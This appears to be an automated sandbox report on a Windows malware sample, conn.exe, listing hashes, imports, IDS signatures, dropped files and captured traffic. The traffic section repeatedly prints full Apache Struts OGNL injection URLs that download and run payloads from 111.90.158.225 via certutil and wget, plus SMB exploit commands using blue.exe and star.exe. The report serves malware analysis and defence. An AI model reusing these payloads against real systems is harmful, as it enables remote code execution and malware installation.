
Posted on 31-Jan-2020


Page 1: Infosec Binary Analisys conn · Infosec Binary Analisys SHELL32.dll ole32.dll WS2_32.dll USER32.dll 13 Behaviors detected by system signatures Created network traffic indicative of

Infosec Binary Analisys

conn.exe

MalScore: 100

File type: MS-DOS executable, MZ for MS-DOS

File size: 2427.00 KB (2485248 bytes)

Compile time: 2018-11-07 09:25:16

MD5: f810c1becd5ed57333ae28d1e085b772

SHA1: bde4104e8f1a5b8d68d940adb1300a2abc5dd0aa

Import hash: d9362ccf7828b415b9cc03e731a349f8

Submitted: 2018-11-09 13:09:08

URL(s) file hosting

http://111.90.158.225/d/conn.exe

Antivirus Report

Report date           Detection Ratio   Permalink

2018-11-09 09:12:07   46/66

Import library

WLDAP32.dll

ADVAPI32.dll

KERNEL32.dll

OLEAUT32.dll

Page 1 Date: 2020-02-15 01:57:34


SHELL32.dll

ole32.dll

WS2_32.dll

USER32.dll

13 Behaviors detected by system signatures

Created network traffic indicative of malicious activity

- signature: ET EXPLOIT Apache Struts getWriter and opensymphony inbound OGNL injection remote code execution attempt
- signature: Traffico Anomalo ? Start Traffico)
- signature: ET WEB_SERVER WGET Command Specifying Output in HTTP Headers
- signature: ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection
- signature: Traffico Anomalo: Traffico verso host malevolo, GET HTTP Content "db" (Soc-Rule)
- signature: ET EXPLOIT Apache Struts memberAccess and opensymphony inbound OGNL injection remote code execution attempt
- signature: ET EXPLOIT Apache Struts memberAccess and getWriter inbound OGNL injection remote code execution attempt
- signature: ET EXPLOIT Apache Struts Possible OGNL Java Exec In URI
- signature: ET WEB_SERVER Possible Apache Struts OGNL in Dynamic Action
- signature: ET SCAN Potential VNC Scan 5900-5920
- signature: ET SCAN Potential VNC Scan 5800-5820
- signature: ET WEB_SERVER Possible SQL Injection (exec)
- signature: Traffico Anomalo: Traffico verso host malevolo, GET HTTP Content "common" (Soc-Rule)
- signature: ET SCAN Suspicious inbound to Oracle SQL port 1521
- signature: ET EXPLOIT Apache Struts Possible OGNL Java ProcessBuilder in client body
- signature: ET WEB_SERVER Suspicious Chmod Usage in URI

Uses Windows utilities for basic functionality

- command: cmd.exe /c cd /D C:\Users\Alluse~1\&blue.exe --TargetIp 192.168.0.0 & star.exe --OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload down64.dll --TargetIp 192.168.0.0
- command: cmd.exe /c cd /D C:\Users\Alluse~1\&blue.exe --TargetIp 192.168.0.1 & star.exe --OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload down64.dll --TargetIp 192.168.0.1

The binary likely contains encrypted or compressed data.

- section: name: .MPRESS1, entropy: 8.00, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x0025d000, virtual_size: 0x00733000

Unconventional language used in binary resources: Chinese (Simplified)

Performs some HTTP requests

- url: http://192.168.0.0/
- url: http://192.168.0.0/ws_utc/resources/setting/options/general
- url: http://192.168.0.0/%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action
- url: http://192.168.0.0/%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action
- url: http://192.168.0.0/%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action
- url: http://192.168.0.0/%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action
- url: http://192.168.0.0/invoker/readonly
- url: http://192.168.0.0/invoker/JMXInvokerServlet
- url: http://192.168.0.0/jmx-console/HtmlAdaptor
- url: http://192.168.0.0/orders.xhtml
- url: http://192.168.0.0/users
- url: http://192.168.0.0/dba_put.jsp/
- url: http://192.168.0.0/dba_put.jsp
- url: http://192.168.0.0/manager/html
- url: http://192.168.0.0/wls-wsat/CoordinatorPortType
- url: http://192.168.0.0:113/
- url: http://183.91.67.0/
- url: http://183.91.67.0/ws_utc/resources/setting/options/general
- url: http://183.91.67.0/%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action
- url: http://183.91.67.0/%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action
- url: http://183.91.67.0/%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action
- url: http://183.91.67.0/%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action
- url: http://183.91.67.0/invoker/readonly
- url: http://183.91.67.0/invoker/JMXInvokerServlet
- url: http://183.91.67.0/jmx-console/HtmlAdaptor
- url: http://183.91.67.0/orders.xhtml
- url: http://183.91.67.0/users
- url: http://183.91.67.0/dba_put.jsp/
- url: http://183.91.67.0/dba_put.jsp
- url: http://183.91.67.0/manager/html
- url: http://183.91.67.0/wls-wsat/CoordinatorPortType
- url: http://183.91.67.0:113/
- url: http://192.168.0.0:3389/
- url: http://183.91.67.0:3389/
- url: http://192.168.0.1/
- url: http://192.168.0.1/ws_utc/resources/setting/options/general
- url: http://192.168.0.1/%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action
- url: http://192.168.0.1/%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action
- url: http://192.168.0.1/%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action
- url: http://192.168.0.1/%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action
- url: http://192.168.0.1/invoker/readonly
- url: http://192.168.0.1/invoker/JMXInvokerServlet
- url: http://192.168.0.1/jmx-console/HtmlAdaptor
- url: http://192.168.0.1/orders.xhtml
- url: http://192.168.0.1/users
- url: http://192.168.0.1/dba_put.jsp/
- url: http://192.168.0.1/dba_put.jsp
- url: http://192.168.0.1/manager/html
- url: http://192.168.0.1/wls-wsat/CoordinatorPortType
- url: http://192.168.0.1:113/

HTTP traffic contains suspicious features which may be indicative of malware related traffic

- post_no_referer: HTTP traffic contains a POST request with no referer header
- get_no_useragent: HTTP traffic contains a GET request with no user-agent header
- ip_hostname: HTTP connection was made to an IP address rather than domain name
- suspicious_request: http://192.168.0.0/
- suspicious_request: http://192.168.0.0/ws_utc/resources/setting/options/general
- suspicious_request: http://192.168.0.0/%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action
- suspicious_request: http://192.168.0.0/%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action
- suspicious_request: http://192.168.0.0/%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action
- suspicious_request: http://192.168.0.0/%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action
- suspicious_request: http://192.168.0.0/invoker/readonly
- suspicious_request: http://192.168.0.0/invoker/JMXInvokerServlet
- suspicious_request: http://192.168.0.0/jmx-console/HtmlAdaptor
- suspicious_request: http://192.168.0.0/orders.xhtml
- suspicious_request: http://192.168.0.0/users
- suspicious_request: http://192.168.0.0/dba_put.jsp/
- suspicious_request: http://192.168.0.0/dba_put.jsp
- suspicious_request: http://192.168.0.0/manager/html
- suspicious_request: http://192.168.0.0/wls-wsat/CoordinatorPortType
- suspicious_request: http://192.168.0.0:113/
- suspicious_request: http://183.91.67.0/
- suspicious_request: http://183.91.67.0/ws_utc/resources/setting/options/general
- suspicious_request: http://183.91.67.0/%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action
- suspicious_request: http://183.91.67.0/%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action
- suspicious_request: http://183.91.67.0/%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action
- suspicious_request: http://183.91.67.0/%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action
- suspicious_request: http://183.91.67.0/invoker/readonly
- suspicious_request: http://183.91.67.0/invoker/JMXInvokerServlet
- suspicious_request: http://183.91.67.0/jmx-console/HtmlAdaptor
- suspicious_request: http://183.91.67.0/orders.xhtml
- suspicious_request: http://183.91.67.0/users
- suspicious_request: http://183.91.67.0/dba_put.jsp/
- suspicious_request: http://183.91.67.0/dba_put.jsp
- suspicious_request: http://183.91.67.0/manager/html
- suspicious_request: http://183.91.67.0/wls-wsat/CoordinatorPortType
- suspicious_request: http://183.91.67.0:113/
- suspicious_request: http://192.168.0.0:3389/
- suspicious_request: http://183.91.67.0:3389/
- suspicious_request: http://192.168.0.1/
- suspicious_request: http://192.168.0.1/ws_utc/resources/setting/options/general
- suspicious_request: http://192.168.0.1/%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action
- suspicious_request: http://192.168.0.1/%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action
- suspicious_request: http://192.168.0.1/%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action
- suspicious_request: http://192.168.0.1/%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action
- suspicious_request: http://192.168.0.1/invoker/readonly
- suspicious_request: http://192.168.0.1/invoker/JMXInvokerServlet
- suspicious_request: http://192.168.0.1/jmx-console/HtmlAdaptor
- suspicious_request: http://192.168.0.1/orders.xhtml
- suspicious_request: http://192.168.0.1/users
- suspicious_request: http://192.168.0.1/dba_put.jsp/
- suspicious_request: http://192.168.0.1/dba_put.jsp
- suspicious_request: http://192.168.0.1/manager/html
- suspicious_request: http://192.168.0.1/wls-wsat/CoordinatorPortType
- suspicious_request: http://192.168.0.1:113/

Drops a binary and executes it

- binary: C:\Users\All Users\mmkt.exe
- binary: C:\Users\All Users\blue.exe
- binary: C:\Users\All Users\star.exe

A process created a hidden window

- Process: conn.exe -> C:\Users\All Users\mmkt.exe
- Process: conn.exe -> cmd.exe
- Process: conn.exe -> cmd.exe

Dynamic (imported) function loading detected

- DynamicLoader: api-ms-win-core-synch-l1-2-0.DLL/InitializeCriticalSectionEx - DynamicLoader: kernel32.dll/FlsAlloc - DynamicLoader: kernel32.dll/FlsSetValue - DynamicLoader: api-ms-win-core-synch-l1-2-0.DLL/InitializeCriticalSectionEx - DynamicLoader: kernel32.dll/FlsAlloc - DynamicLoader: kernel32.dll/FlsGetValue - DynamicLoader: kernel32.dll/FlsSetValue - DynamicLoader: kernel32.dll/LCMapStringEx - DynamicLoader: kernel32.dll/FlsAlloc - DynamicLoader: kernel32.dll/FlsFree - DynamicLoader: kernel32.dll/FlsGetValue - DynamicLoader: kernel32.dll/FlsSetValue - DynamicLoader: kernel32.dll/InitializeCriticalSectionEx - DynamicLoader: kernel32.dll/InitOnceExecuteOnce - DynamicLoader: kernel32.dll/CreateEventExW - DynamicLoader: kernel32.dll/CreateSemaphoreW - DynamicLoader: kernel32.dll/CreateSemaphoreExW - DynamicLoader: kernel32.dll/CreateThreadpoolTimer - DynamicLoader: kernel32.dll/SetThreadpoolTimer - DynamicLoader: kernel32.dll/WaitForThreadpoolTimerCallbacks - DynamicLoader: kernel32.dll/CloseThreadpoolTimer - DynamicLoader: kernel32.dll/CreateThreadpoolWait - DynamicLoader: kernel32.dll/SetThreadpoolWait - DynamicLoader: kernel32.dll/CloseThreadpoolWait - DynamicLoader: kernel32.dll/FlushProcessWriteBuffers

Page 8 Date: 2020-02-15 01:57:34

Page 9: Infosec Binary Analisys conn · Infosec Binary Analisys SHELL32.dll ole32.dll WS2_32.dll USER32.dll 13 Behaviors detected by system signatures Created network traffic indicative of

Infosec Binary Analisys

